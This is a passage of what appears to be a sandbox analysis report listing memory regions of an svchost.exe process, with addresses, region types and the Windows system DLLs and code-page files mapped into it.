start_va = 0x2f00000
end_va = 0x2ffffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002f00000"
filename = ""
Region:
id = 1148
start_va = 0x3000000
end_va = 0x30fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003000000"
filename = ""
Region:
id = 1149
start_va = 0x3100000
end_va = 0x31fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003100000"
filename = ""
Region:
id = 1150
start_va = 0x3300000
end_va = 0x337ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003300000"
filename = ""
Region:
id = 1151
start_va = 0x3380000
end_va = 0x347ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003380000"
filename = ""
Region:
id = 1152
start_va = 0x3480000
end_va = 0x34fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003480000"
filename = ""
Region:
id = 1153
start_va = 0x3560000
end_va = 0x3566fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003560000"
filename = ""
Region:
id = 1154
start_va = 0x3570000
end_va = 0x35effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003570000"
filename = ""
Region:
id = 1155
start_va = 0x3600000
end_va = 0x36fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003600000"
filename = ""
Region:
id = 1156
start_va = 0x3700000
end_va = 0x37fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003700000"
filename = ""
Region:
id = 1157
start_va = 0x3800000
end_va = 0x38fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003800000"
filename = ""
Region:
id = 1158
start_va = 0x3900000
end_va = 0x397ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003900000"
filename = ""
Region:
id = 1159
start_va = 0x3980000
end_va = 0x39fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003980000"
filename = ""
Region:
id = 1160
start_va = 0x3a00000
end_va = 0x3afffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003a00000"
filename = ""
Region:
id = 1161
start_va = 0x3b00000
end_va = 0x3bfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003b00000"
filename = ""
Region:
id = 1162
start_va = 0x3c00000
end_va = 0x3c7ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003c00000"
filename = ""
Region:
id = 1163
start_va = 0x3c80000
end_va = 0x3cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003c80000"
filename = ""
Region:
id = 1164
start_va = 0x3d00000
end_va = 0x3d7ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003d00000"
filename = ""
Region:
id = 1165
start_va = 0x3d80000
end_va = 0x3e7ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003d80000"
filename = ""
Region:
id = 1166
start_va = 0x3e80000
end_va = 0x3f7ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003e80000"
filename = ""
Region:
id = 1167
start_va = 0x3f80000
end_va = 0x407ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003f80000"
filename = ""
Region:
id = 1168
start_va = 0x4180000
end_va = 0x427ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004180000"
filename = ""
Region:
id = 1169
start_va = 0x4280000
end_va = 0x437ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004280000"
filename = ""
Region:
id = 1170
start_va = 0x4600000
end_va = 0x46fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004600000"
filename = ""
Region:
id = 1171
start_va = 0x4700000
end_va = 0x47fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004700000"
filename = ""
Region:
id = 1172
start_va = 0x4800000
end_va = 0x48fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004800000"
filename = ""
Region:
id = 1173
start_va = 0x4900000
end_va = 0x49fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004900000"
filename = ""
Region:
id = 1174
start_va = 0x4a00000
end_va = 0x4afffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004a00000"
filename = ""
Region:
id = 1175
start_va = 0x4b00000
end_va = 0x4bfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004b00000"
filename = ""
Region:
id = 1176
start_va = 0x4c00000
end_va = 0x4cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004c00000"
filename = ""
Region:
id = 1177
start_va = 0x4d00000
end_va = 0x4dfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004d00000"
filename = ""
Region:
id = 1178
start_va = 0x4e00000
end_va = 0x4efffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004e00000"
filename = ""
Region:
id = 1179
start_va = 0x4f00000
end_va = 0x4ffffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004f00000"
filename = ""
Region:
id = 1180
start_va = 0x5000000
end_va = 0x50fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005000000"
filename = ""
Region:
id = 1181
start_va = 0x5200000
end_va = 0x52fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005200000"
filename = ""
Region:
id = 1182
start_va = 0x5300000
end_va = 0x53fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005300000"
filename = ""
Region:
id = 1183
start_va = 0x5500000
end_va = 0x55fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005500000"
filename = ""
Region:
id = 1184
start_va = 0x5600000
end_va = 0x56fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005600000"
filename = ""
Region:
id = 1185
start_va = 0x5a40000
end_va = 0x5a46fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005a40000"
filename = ""
Region:
id = 1186
start_va = 0x5a50000
end_va = 0x5a50fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "msxml6r.dll"
filename = "\\Windows\\System32\\msxml6r.dll" (normalized: "c:\\windows\\system32\\msxml6r.dll")
Region:
id = 1187
start_va = 0x5a60000
end_va = 0x5a60fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000005a60000"
filename = ""
Region:
id = 1188
start_va = 0x5a70000
end_va = 0x5a7ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "winnlsres.dll.mui"
filename = "\\Windows\\System32\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\winnlsres.dll.mui")
Region:
id = 1189
start_va = 0x5a90000
end_va = 0x5aa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "c_1256.nls"
filename = "\\Windows\\System32\\C_1256.NLS" (normalized: "c:\\windows\\system32\\c_1256.nls")
Region:
id = 1190
start_va = 0x5ab0000
end_va = 0x5ac0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "c_1251.nls"
filename = "\\Windows\\System32\\C_1251.NLS" (normalized: "c:\\windows\\system32\\c_1251.nls")
Region:
id = 1191
start_va = 0x5ad0000
end_va = 0x5ae0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "c_1254.nls"
filename = "\\Windows\\System32\\C_1254.NLS" (normalized: "c:\\windows\\system32\\c_1254.nls")
Region:
id = 1192
start_va = 0x5b00000
end_va = 0x5bfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005b00000"
filename = ""
Region:
id = 1193
start_va = 0x5e00000
end_va = 0x5efffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005e00000"
filename = ""
Region:
id = 1194
start_va = 0x5f00000
end_va = 0x5f10fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "c_1250.nls"
filename = "\\Windows\\System32\\C_1250.NLS" (normalized: "c:\\windows\\system32\\c_1250.nls")
Region:
id = 1195
start_va = 0x5f20000
end_va = 0x5f30fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "c_1253.nls"
filename = "\\Windows\\System32\\C_1253.NLS" (normalized: "c:\\windows\\system32\\c_1253.nls")
Region:
id = 1196
start_va = 0x5f40000
end_va = 0x5f50fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "c_1257.nls"
filename = "\\Windows\\System32\\C_1257.NLS" (normalized: "c:\\windows\\system32\\c_1257.nls")
Region:
id = 1197
start_va = 0x5f60000
end_va = 0x5f70fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "c_1255.nls"
filename = "\\Windows\\System32\\C_1255.NLS" (normalized: "c:\\windows\\system32\\c_1255.nls")
Region:
id = 1198
start_va = 0x5f80000
end_va = 0x5fa7fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "c_932.nls"
filename = "\\Windows\\System32\\C_932.NLS" (normalized: "c:\\windows\\system32\\c_932.nls")
Region:
id = 1199
start_va = 0x5fc0000
end_va = 0x5fc6fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005fc0000"
filename = ""
Region:
id = 1200
start_va = 0x5fd0000
end_va = 0x60cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005fd0000"
filename = ""
Region:
id = 1201
start_va = 0x60d0000
end_va = 0x60e0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "c_874.nls"
filename = "\\Windows\\System32\\C_874.NLS" (normalized: "c:\\windows\\system32\\c_874.nls")
Region:
id = 1202
start_va = 0x6100000
end_va = 0x61fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006100000"
filename = ""
Region:
id = 1203
start_va = 0x6200000
end_va = 0x62fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006200000"
filename = ""
Region:
id = 1204
start_va = 0x6300000
end_va = 0x63fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006300000"
filename = ""
Region:
id = 1205
start_va = 0x6400000
end_va = 0x64fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006400000"
filename = ""
Region:
id = 1206
start_va = 0x6500000
end_va = 0x65fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006500000"
filename = ""
Region:
id = 1207
start_va = 0x6700000
end_va = 0x67fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006700000"
filename = ""
Region:
id = 1208
start_va = 0x6800000
end_va = 0x68fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006800000"
filename = ""
Region:
id = 1209
start_va = 0x6900000
end_va = 0x69fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006900000"
filename = ""
Region:
id = 1210
start_va = 0x6a00000
end_va = 0x6afffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006a00000"
filename = ""
Region:
id = 1211
start_va = 0x6b00000
end_va = 0x6bfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006b00000"
filename = ""
Region:
id = 1212
start_va = 0x6c00000
end_va = 0x6cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006c00000"
filename = ""
Region:
id = 1213
start_va = 0x6d00000
end_va = 0x6dfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006d00000"
filename = ""
Region:
id = 1214
start_va = 0x6e00000
end_va = 0x6efffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006e00000"
filename = ""
Region:
id = 1215
start_va = 0x7000000
end_va = 0x70fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007000000"
filename = ""
Region:
id = 1216
start_va = 0x7200000
end_va = 0x7230fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "c_949.nls"
filename = "\\Windows\\System32\\C_949.NLS" (normalized: "c:\\windows\\system32\\c_949.nls")
Region:
id = 1217
start_va = 0x7240000
end_va = 0x7250fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "c_1258.nls"
filename = "\\Windows\\System32\\C_1258.NLS" (normalized: "c:\\windows\\system32\\c_1258.nls")
Region:
id = 1218
start_va = 0x7260000
end_va = 0x7290fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "c_936.nls"
filename = "\\Windows\\System32\\C_936.NLS" (normalized: "c:\\windows\\system32\\c_936.nls")
Region:
id = 1219
start_va = 0x72a0000
end_va = 0x72d0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "c_950.nls"
filename = "\\Windows\\System32\\C_950.NLS" (normalized: "c:\\windows\\system32\\c_950.nls")
Region:
id = 1220
start_va = 0x7300000
end_va = 0x73fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007300000"
filename = ""
Region:
id = 1221
start_va = 0x7830000
end_va = 0x792ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007830000"
filename = ""
Region:
id = 1222
start_va = 0x7a30000
end_va = 0x7b2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007a30000"
filename = ""
Region:
id = 1223
start_va = 0x8430000
end_va = 0x852ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008430000"
filename = ""
Region:
id = 1224
start_va = 0x8930000
end_va = 0x8a2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008930000"
filename = ""
Region:
id = 1225
start_va = 0x8d30000
end_va = 0x8e2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008d30000"
filename = ""
Region:
id = 1226
start_va = 0x8f30000
end_va = 0x902ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008f30000"
filename = ""
Region:
id = 1227
start_va = 0x9030000
end_va = 0x912ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009030000"
filename = ""
Region:
id = 1228
start_va = 0x9130000
end_va = 0x922ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009130000"
filename = ""
Region:
id = 1229
start_va = 0x9230000
end_va = 0x932ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009230000"
filename = ""
Region:
id = 1230
start_va = 0x9330000
end_va = 0x942ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009330000"
filename = ""
Region:
id = 1231
start_va = 0x9430000
end_va = 0x952ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009430000"
filename = ""
Region:
id = 1232
start_va = 0x9530000
end_va = 0x962ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009530000"
filename = ""
Region:
id = 1233
start_va = 0x9630000
end_va = 0x972ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009630000"
filename = ""
Region:
id = 1234
start_va = 0x9730000
end_va = 0x982ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009730000"
filename = ""
Region:
id = 1235
start_va = 0x9830000
end_va = 0x992ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009830000"
filename = ""
Region:
id = 1236
start_va = 0x9930000
end_va = 0x9a2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009930000"
filename = ""
Region:
id = 1237
start_va = 0x9a30000
end_va = 0x9b2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009a30000"
filename = ""
Region:
id = 1238
start_va = 0x9c30000
end_va = 0x9d2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009c30000"
filename = ""
Region:
id = 1239
start_va = 0x9d30000
end_va = 0x9e2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009d30000"
filename = ""
Region:
id = 1240
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 1241
start_va = 0x7df5ffec0000
end_va = 0x7df5fffbffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007df5ffec0000"
filename = ""
Region:
id = 1242
start_va = 0x7df5fffc0000
end_va = 0x7df5fffe2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007df5fffc0000"
filename = ""
Region:
id = 1243
start_va = 0x7df5ffff0000
end_va = 0x7ff5fffeffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007df5ffff0000"
filename = ""
Region:
id = 1244
start_va = 0x7ff60e670000
end_va = 0x7ff60e67cfff
monitored = 0
entry_point = 0x7ff60e673980
region_type = mapped_file
name = "svchost.exe"
filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe")
Region:
id = 1245
start_va = 0x7ffc41570000
end_va = 0x7ffc41586fff
monitored = 0
entry_point = 0x7ffc41577520
region_type = mapped_file
name = "usoapi.dll"
filename = "\\Windows\\System32\\usoapi.dll" (normalized: "c:\\windows\\system32\\usoapi.dll")
Region:
id = 1246
start_va = 0x7ffc415b0000
end_va = 0x7ffc4185ffff
monitored = 0
entry_point = 0x7ffc415b1cf0
region_type = mapped_file
name = "netshell.dll"
filename = "\\Windows\\System32\\netshell.dll" (normalized: "c:\\windows\\system32\\netshell.dll")
Region:
id = 1247
start_va = 0x7ffc41860000
end_va = 0x7ffc418a3fff
monitored = 0
entry_point = 0x7ffc418883e0
region_type = mapped_file
name = "updatehandlers.dll"
filename = "\\Windows\\System32\\updatehandlers.dll" (normalized: "c:\\windows\\system32\\updatehandlers.dll")
Region:
id = 1248
start_va = 0x7ffc418b0000
end_va = 0x7ffc4190cfff
monitored = 0
entry_point = 0x7ffc418de510
region_type = mapped_file
name = "usocore.dll"
filename = "\\Windows\\System32\\usocore.dll" (normalized: "c:\\windows\\system32\\usocore.dll")
Region:
id = 1249
start_va = 0x7ffc43a40000
end_va = 0x7ffc43a51fff
monitored = 0
entry_point = 0x7ffc43a41a80
region_type = mapped_file
name = "bitsproxy.dll"
filename = "\\Windows\\System32\\BitsProxy.dll" (normalized: "c:\\windows\\system32\\bitsproxy.dll")
Region:
id = 1250
start_va = 0x7ffc43a60000
end_va = 0x7ffc43a9efff
monitored = 0
entry_point = 0x7ffc43a882d0
region_type = mapped_file
name = "tcpipcfg.dll"
filename = "\\Windows\\System32\\tcpipcfg.dll" (normalized: "c:\\windows\\system32\\tcpipcfg.dll")
Region:
id = 1251
start_va = 0x7ffc44a60000
end_va = 0x7ffc44a70fff
monitored = 0
entry_point = 0x7ffc44a628d0
region_type = mapped_file
name = "credentialmigrationhandler.dll"
filename = "\\Windows\\System32\\CredentialMigrationHandler.dll" (normalized: "c:\\windows\\system32\\credentialmigrationhandler.dll")
Region:
id = 1252
start_va = 0x7ffc44a80000
end_va = 0x7ffc44ab1fff
monitored = 0
entry_point = 0x7ffc44a8b0c0
region_type = mapped_file
name = "shacct.dll"
filename = "\\Windows\\System32\\shacct.dll" (normalized: "c:\\windows\\system32\\shacct.dll")
Region:
id = 1253
start_va = 0x7ffc44db0000
end_va = 0x7ffc44dc7fff
monitored = 0
entry_point = 0x7ffc44db1b10
region_type = mapped_file
name = "locationframeworkinternalps.dll"
filename = "\\Windows\\System32\\LocationFrameworkInternalPS.dll" (normalized: "c:\\windows\\system32\\locationframeworkinternalps.dll")
Region:
id = 1254
start_va = 0x7ffc44dd0000
end_va = 0x7ffc44decfff
monitored = 0
entry_point = 0x7ffc44dd4f60
region_type = mapped_file
name = "appinfo.dll"
filename = "\\Windows\\System32\\appinfo.dll" (normalized: "c:\\windows\\system32\\appinfo.dll")
Region:
id = 1255
start_va = 0x7ffc45dd0000
end_va = 0x7ffc45edefff
monitored = 0
entry_point = 0x7ffc45e0c010
region_type = mapped_file
name = "dosvc.dll"
filename = "\\Windows\\System32\\dosvc.dll" (normalized: "c:\\windows\\system32\\dosvc.dll")
Region:
id = 1256
start_va = 0x7ffc46030000
end_va = 0x7ffc46075fff
monitored = 0
entry_point = 0x7ffc460379a0
region_type = mapped_file
name = "adsldp.dll"
filename = "\\Windows\\System32\\adsldp.dll" (normalized: "c:\\windows\\system32\\adsldp.dll")
Region:
id = 1257
start_va = 0x7ffc47160000
end_va = 0x7ffc47167fff
monitored = 0
entry_point = 0x7ffc471613b0
region_type = mapped_file
name = "dmiso8601utils.dll"
filename = "\\Windows\\System32\\dmiso8601utils.dll" (normalized: "c:\\windows\\system32\\dmiso8601utils.dll")
Region:
id = 1258
start_va = 0x7ffc472e0000
end_va = 0x7ffc473fcfff
monitored = 0
entry_point = 0x7ffc4730fe60
region_type = mapped_file
name = "qmgr.dll"
filename = "\\Windows\\System32\\qmgr.dll" (normalized: "c:\\windows\\system32\\qmgr.dll")
Region:
id = 1259
start_va = 0x7ffc49c60000
end_va = 0x7ffc49cc6fff
monitored = 0
entry_point = 0x7ffc49c6b160
region_type = mapped_file
name = "upnp.dll"
filename = "\\Windows\\System32\\upnp.dll" (normalized: "c:\\windows\\system32\\upnp.dll")
Region:
id = 1260
start_va = 0x7ffc49cd0000
end_va = 0x7ffc49ce3fff
monitored = 0
entry_point = 0x7ffc49cd2a00
region_type = mapped_file
name = "bitsigd.dll"
filename = "\\Windows\\System32\\bitsigd.dll" (normalized: "c:\\windows\\system32\\bitsigd.dll")
Region:
id = 1261
start_va = 0x7ffc4bc90000
end_va = 0x7ffc4bcc5fff
monitored = 0
entry_point = 0x7ffc4bc927f0
region_type = mapped_file
name = "windows.networking.hostname.dll"
filename = "\\Windows\\System32\\Windows.Networking.HostName.dll" (normalized: "c:\\windows\\system32\\windows.networking.hostname.dll")
Region:
id = 1262
start_va = 0x7ffc4bd50000
end_va = 0x7ffc4bd63fff
monitored = 0
entry_point = 0x7ffc4bd53710
region_type = mapped_file
name = "mskeyprotect.dll"
filename = "\\Windows\\System32\\mskeyprotect.dll" (normalized: "c:\\windows\\system32\\mskeyprotect.dll")
Region:
id = 1263
start_va = 0x7ffc4bd70000
end_va = 0x7ffc4bd97fff
monitored = 0
entry_point = 0x7ffc4bd7efc0
region_type = mapped_file
name = "dssenh.dll"
filename = "\\Windows\\System32\\dssenh.dll" (normalized: "c:\\windows\\system32\\dssenh.dll")
Region:
id = 1264
start_va = 0x7ffc4be00000
end_va = 0x7ffc4be1dfff
monitored = 0
entry_point = 0x7ffc4be0ef80
region_type = mapped_file
name = "ncryptsslp.dll"
filename = "\\Windows\\System32\\ncryptsslp.dll" (normalized: "c:\\windows\\system32\\ncryptsslp.dll")
Region:
id = 1265
start_va = 0x7ffc4be20000
end_va = 0x7ffc4be35fff
monitored = 0
entry_point = 0x7ffc4be21af0
region_type = mapped_file
name = "napinsp.dll"
filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: "c:\\windows\\system32\\napinsp.dll")
Region:
id = 1266
start_va = 0x7ffc4be40000
end_va = 0x7ffc4be59fff
monitored = 0
entry_point = 0x7ffc4be42330
region_type = mapped_file
name = "pnrpnsp.dll"
filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll")
Region:
id = 1267
start_va = 0x7ffc4be60000
end_va = 0x7ffc4be6cfff
monitored = 0
entry_point = 0x7ffc4be61420
region_type = mapped_file
name = "winrnr.dll"
filename = "\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll")
Region:
id = 1268
start_va = 0x7ffc4c140000
end_va = 0x7ffc4c1c3fff
monitored = 0
entry_point = 0x7ffc4c158d50
region_type = mapped_file
name = "wbemess.dll"
filename = "\\Windows\\System32\\wbem\\wbemess.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemess.dll")
Region:
id = 1269
start_va = 0x7ffc4c1d0000
end_va = 0x7ffc4c1e5fff
monitored = 0
entry_point = 0x7ffc4c1d55e0
region_type = mapped_file
name = "ncobjapi.dll"
filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll")
Region:
id = 1270
start_va = 0x7ffc4c1f0000
end_va = 0x7ffc4c2c5fff
monitored = 0
entry_point = 0x7ffc4c21a800
region_type = mapped_file
name = "wmiprvsd.dll"
filename = "\\Windows\\System32\\wbem\\WmiPrvSD.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiprvsd.dll")
Region:
id = 1271
start_va = 0x7ffc4c2d0000
end_va = 0x7ffc4c333fff
monitored = 0
entry_point = 0x7ffc4c2ebed0
region_type = mapped_file
name = "repdrvfs.dll"
filename = "\\Windows\\System32\\wbem\\repdrvfs.dll" (normalized: "c:\\windows\\system32\\wbem\\repdrvfs.dll")
Region:
id = 1272
start_va = 0x7ffc4c340000
end_va = 0x7ffc4c364fff
monitored = 0
entry_point = 0x7ffc4c349900
region_type = mapped_file
name = "wmiutils.dll"
filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll")
Region:
id = 1273
start_va = 0x7ffc4c370000
end_va = 0x7ffc4c383fff
monitored = 0
entry_point = 0x7ffc4c371800
region_type = mapped_file
name = "wbemsvc.dll"
filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll")
Region:
id = 1274
start_va = 0x7ffc4c390000
end_va = 0x7ffc4c485fff
monitored = 0
entry_point = 0x7ffc4c3c9590
region_type = mapped_file
name = "fastprox.dll"
filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll")
Region:
id = 1275
start_va = 0x7ffc4c490000
end_va = 0x7ffc4c503fff
monitored = 0
entry_point = 0x7ffc4c4a5eb0
region_type = mapped_file
name = "esscli.dll"
filename = "\\Windows\\System32\\wbem\\esscli.dll" (normalized: "c:\\windows\\system32\\wbem\\esscli.dll")
Region:
id = 1276
start_va = 0x7ffc4c510000
end_va = 0x7ffc4c646fff
monitored = 0
entry_point = 0x7ffc4c550480
region_type = mapped_file
name = "wbemcore.dll"
filename = "\\Windows\\System32\\wbem\\wbemcore.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemcore.dll")
Region:
id = 1277
start_va = 0x7ffc4c650000
end_va = 0x7ffc4c65efff
monitored = 0
entry_point = 0x7ffc4c654960
region_type = mapped_file
name = "nci.dll"
filename = "\\Windows\\System32\\nci.dll" (normalized: "c:\\windows\\system32\\nci.dll")
Region:
id = 1278
start_va = 0x7ffc4c680000
end_va = 0x7ffc4c8f9fff
monitored = 0
entry_point = 0x7ffc4c69a7a0
region_type = mapped_file
name = "msxml6.dll"
filename = "\\Windows\\System32\\msxml6.dll" (normalized: "c:\\windows\\system32\\msxml6.dll")
Region:
id = 1279
start_va = 0x7ffc4c9c0000
end_va = 0x7ffc4c9cffff
monitored = 0
entry_point = 0x7ffc4c9c1690
region_type = mapped_file
name = "wups.dll"
filename = "\\Windows\\System32\\wups.dll" (normalized: "c:\\windows\\system32\\wups.dll")
Region:
id = 1280
start_va = 0x7ffc4cc10000
end_va = 0x7ffc4cc20fff
monitored = 0
entry_point = 0x7ffc4cc17480
region_type = mapped_file
name = "tetheringclient.dll"
filename = "\\Windows\\System32\\tetheringclient.dll" (normalized: "c:\\windows\\system32\\tetheringclient.dll")
Region:
id = 1281
start_va = 0x7ffc4dbb0000
end_va = 0x7ffc4dbc0fff
monitored = 0
entry_point = 0x7ffc4dbb2fc0
region_type = mapped_file
name = "wbemprox.dll"
filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll")
Region:
id = 1282
start_va = 0x7ffc4dbd0000
end_va = 0x7ffc4dbedfff
monitored = 0
entry_point = 0x7ffc4dbd3a40
region_type = mapped_file
name = "atl.dll"
filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll")
Region:
id = 1283
start_va = 0x7ffc4dbf0000
end_va = 0x7ffc4dc71fff
monitored = 0
entry_point = 0x7ffc4dbf2a10
region_type = mapped_file
name = "hnetcfg.dll"
filename = "\\Windows\\System32\\hnetcfg.dll" (normalized: "c:\\windows\\system32\\hnetcfg.dll")
Region:
id = 1284
start_va = 0x7ffc4dcd0000
end_va = 0x7ffc4dd0ffff
monitored = 0
entry_point = 0x7ffc4dcdcbe0
region_type = mapped_file
name = "adsldpc.dll"
filename = "\\Windows\\System32\\adsldpc.dll" (normalized: "c:\\windows\\system32\\adsldpc.dll")
Region:
id = 1285
start_va = 0x7ffc4dd10000
end_va = 0x7ffc4dd56fff
monitored = 0
entry_point = 0x7ffc4dd11d10
region_type = mapped_file
name = "activeds.dll"
filename = "\\Windows\\System32\\activeds.dll" (normalized: "c:\\windows\\system32\\activeds.dll")
Region:
id = 1286
start_va = 0x7ffc4dd60000
end_va = 0x7ffc4dda1fff
monitored = 0
entry_point = 0x7ffc4dd63670
region_type = mapped_file
name = "wdscore.dll"
filename = "\\Windows\\System32\\wdscore.dll" (normalized: "c:\\windows\\system32\\wdscore.dll")
Region:
id = 1287
start_va = 0x7ffc4ddd0000
end_va = 0x7ffc4ddf1fff
monitored = 0
entry_point = 0x7ffc4dde2540
region_type = mapped_file
name = "updatepolicy.dll"
filename = "\\Windows\\System32\\updatepolicy.dll" (normalized: "c:\\windows\\system32\\updatepolicy.dll")
Region:
id = 1288
start_va = 0x7ffc4de00000
end_va = 0x7ffc4ded4fff
monitored = 0
entry_point = 0x7ffc4de1cf80
region_type = mapped_file
name = "wuapi.dll"
filename = "\\Windows\\System32\\wuapi.dll" (normalized: "c:\\windows\\system32\\wuapi.dll")
Region:
id = 1289
start_va = 0x7ffc4dfc0000
